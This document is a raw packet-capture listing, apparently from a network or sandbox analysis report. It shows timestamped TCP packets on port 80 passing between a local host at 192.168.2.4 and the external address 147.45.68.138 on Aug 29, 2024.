                                                      Aug 29, 2024 22:52:29.606343031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606354952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606355906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606365919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606373072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606393099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606415033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606518030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606560946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606694937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606707096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606717110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606726885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606738091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606743097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606749058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606760025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606769085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606776953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606777906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606790066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606798887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606800079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606811047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606822014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606822014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606832981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606834888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606846094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.606848955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606859922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.606878042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607162952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607208014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607263088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607274055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607284069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607309103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607311964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607321978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607323885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607347012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607348919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607358932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607367039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607372046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607383966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607386112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607393980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607407093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607413054 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607419968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607429981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607440948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607444048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607451916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607465982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607490063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607772112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607815027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607846975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607857943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607891083 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607923031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607933998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607944965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607968092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607970953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607980967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.607986927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.607991934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608011007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608026028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608098030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608108997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608119011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608130932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608140945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608140945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608150005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608180046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608234882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608277082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608340979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608352900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608381033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608429909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608441114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608450890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608462095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.608478069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608491898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.608514071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.690942049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.690987110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.690990925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691021919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691034079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691046953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691051960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691056967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691147089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691390038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691411972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691441059 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691456079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691464901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691499949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691541910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691555023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691565037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691586971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691612959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.691632032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691643953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.691678047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692074060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692085028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692097902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692121029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692121983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692132950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692145109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692162991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692177057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692182064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692188978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692200899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692203045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692212105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692223072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692250967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692261934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692279100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692289114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692300081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692303896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692326069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692353964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692378044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692389965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692413092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692423105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692423105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692436934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692446947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692454100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692472935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692473888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692492008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692495108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692506075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692517042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692517996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692528963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692528963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692543030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692548990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692572117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692593098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692620039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692636967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692646980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692658901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692661047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692679882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692691088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692745924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692773104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692789078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692790031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692800045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692811966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692822933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692826033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692842007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692847013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692854881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692861080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692867041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692878962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692879915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692895889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692902088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692915916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692920923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692939997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692941904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692953110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692962885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692964077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.692971945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.692991972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693007946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693031073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693042040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693052053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693062067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693073034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693077087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693095922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693120003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693124056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693135977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693145990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693159103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693169117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693193913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693403006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693448067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693501949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693511963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693521023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693547010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693552017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693558931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693561077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693572044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693581104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693586111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693593979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693613052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693625927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693629980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693644047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693655968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693666935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693667889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693687916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693701982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693707943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693721056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693731070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693742037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693749905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693773031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693794012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693927050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693938971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693949938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.693973064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.693993092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694046021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694070101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694082975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694094896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694096088 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694108963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694123983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694271088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694314003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694345951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694356918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694386959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694428921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694438934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694448948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694459915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694472075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694477081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694487095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694490910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694498062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694518089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694535971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694753885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694765091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694775105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694797993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694817066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694902897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694915056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694925070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694936037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694947004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694948912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694960117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694972038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694972992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694982052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.694988012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.694994926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695007086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695015907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695019960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695031881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695041895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695061922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695082903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695256948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695267916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695278883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695307016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695319891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695348024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695365906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695378065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695386887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695400953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695420980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.695439100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.695482969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778140068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778301001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778317928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778330088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778338909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778351068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778357983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778362036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778377056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778377056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778389931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778404951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778413057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778419971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778433084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778461933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778479099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778490067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778500080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778512001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778522968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778522968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778537035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778539896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778561115 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778584003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778799057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778842926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.778877974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778896093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.778919935 CEST4973980192.168.2.4147.45.68.138
